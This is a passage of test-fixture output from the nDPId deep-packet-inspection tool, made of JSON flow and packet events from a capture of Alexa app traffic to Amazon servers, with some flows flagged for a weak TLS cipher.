{"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1490976088880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088880,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8m\/dAAEAGPiKsECrYCsl+8Z0yH5CNbMQpAAAAAKAC\/\/93BQAAAgQFtAQCCAoA9mEIAAAAAAEDAwg="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088937,"flow_last_seen":1490976088937,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976088937,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1490976088937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088937,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8PTlAAEAGCbasECrYNF7ohrKPAbuIDFw0AAAAAKAC\/\/9ZowAAAgQFtAQCCAoA9mENAAAAAAEDAwg="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1281,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088958,"flow_last_seen":1490976088958,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976088958,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1281,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1490976088958,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088958,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8FFJAAEAGMp2sECrYNF7ohrKQAbsDIHVdAAAAAKAC\/\/\/FYwAAAgQFtAQCCAoA9mEPAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976089173,"flow_last_seen":1490976089173,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976089173,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1490976089173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089173,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Al9AAEAGRJCsECrYNF7ohsHbAFAaMGN6AAAAAKAC\/\/+yQAAAAgQFtAQCCAoA9mElAAAAAAEDAwg="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1283,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976089227,"flow_last_seen":1490976089227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976089227,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1283,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1490976089227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089227,"pkt":"AMDKkaPvePiC0\/vCCABFAAA835BAAEAGZ16sECrYNF7ohrKSAbuabb66AAAAAKAC\/\/\/kmwAAAgQFtAQCCAoA9mEqAAAAAAEDAwg="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976089239,"flow_last_seen":1490976089239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976089239,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1490976089239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089239,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8TPtAAEAG+fOsECrYNF7ohrKTAbvSFy3QAAAAAKAC\/\/892gAAAgQFtAQCCAoA9mErAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1285,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976089426,"flow_last_seen":1490976089426,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976089426,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1285,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1490976089426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089426,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZGdAAEAG4oesECrYNF7ohsHeAFAhsQVZAAAAAKAC\/\/8IxQAAAgQFtAQCCAoA9mE+AAAAAAEDAwg="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1289,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1490976089930,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089930,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8PTpAAEAGCbWsECrYNF7ohrKPAbuIDFw0AAAAAKAC\/\/9ZPwAAAgQFtAQCCAoA9mFxAAAAAAEDAwg="} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1290,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1490976089963,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089963,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8FFNAAEAGMpysECrYNF7ohrKQAbsDIHVdAAAAAKAC\/\/\/E\/wAAAgQFtAQCCAoA9mFzAAAAAAEDAwg="} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1294,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088631,"flow_last_seen":1490976090037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976090037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1297,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088605,"flow_last_seen":1490976090037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976090037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1300,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwtKtAAOcG6040XuiGrBAq2AG7spNBzzb30hct0XASH\/5DQAAAAgQFtAEDAwY="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1301,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":3,"flow_last_seen":1490976090038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwe6ZAAOcGJFQ0XuiGrBAq2AG7so\/BFRS5iAxcNXASH\/4B4wAAAgQFtAEDAwY="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwa1pAAOcGNKA0XuiGrBAq2ABQwd5KW8E7IbEFWnASH\/57bQAAAgQFtAEDAwY="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1303,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwe7VAAOcGJEU0XuiGrBAq2AG7spKfnILVmm2+u3ASH\/5AVQAAAgQFtAEDAwY="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1304,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":1490976090038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw9UZAAOcGqrM0XuiGrBAq2AG7spCu8tJmAyB1XnASH\/7CGgAAAgQFtAEDAwY="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1305,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwjedAAOcGEhM0XuiGrBAq2ABQwds2rrGpGjBje3ASH\/5IDwAAAgQFtAEDAwY="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1313,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_packet_id":3,"flow_last_seen":1490976090170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976090170,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8AmBAAEAGRI+sECrYNF7ohsHbAFAaMGN6AAAAAKAC\/\/+x3AAAAgQFtAQCCAoA9mGJAAAAAAEDAwg="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1314,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoTPxAAEAG+gasECrYNF7ohrKTAbvSFy3RQc82+FAQAVeNsQAA"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZGhAAEAG4pqsECrYNF7ohsHeAFAhsQVaSlvBPFAQAVfF3gAA"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo35FAAEAGZ3GsECrYNF7ohrKSAbuabb67n5yC1lAQAVeKxgAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1322,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089239,"flow_last_seen":1490976090191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090191,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088937,"flow_last_seen":1490976090191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976090191,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1324,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089227,"flow_last_seen":1490976090192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090192,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1325,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976088958,"flow_last_seen":1490976090192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976090192,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1327,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089426,"flow_last_seen":1490976090196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1490976090196,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/lib\/bootstrap\/img\/glyphicons-halflings.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1343,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976089239,"flow_last_seen":1490976090313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1345,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976088958,"flow_last_seen":1490976090313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1346,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976089227,"flow_last_seen":1490976090313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090572,"flow_last_seen":1490976090572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976090572,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1490976090572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976090572,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8o8xAAEAGcF6sECrYNu8YuoUVAbs6msJ9AAAAAKAC\/\/863gAAAgQFtAQCCAoA9mGxAAAAAAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1396,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1490976090753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090753,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwZiVAAOcGBxE27xi6rBAq2AG7hRXpU+crOprCfnASH\/7pEAAAAgQFtAEDAwY="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1400,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":3,"flow_last_seen":1490976090756,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090756,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoo81AAEAGcHGsECrYNu8YuoUVAbs6msJ+6VPnLFAQAVczggAA"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1401,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976090572,"flow_last_seen":1490976090757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090757,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 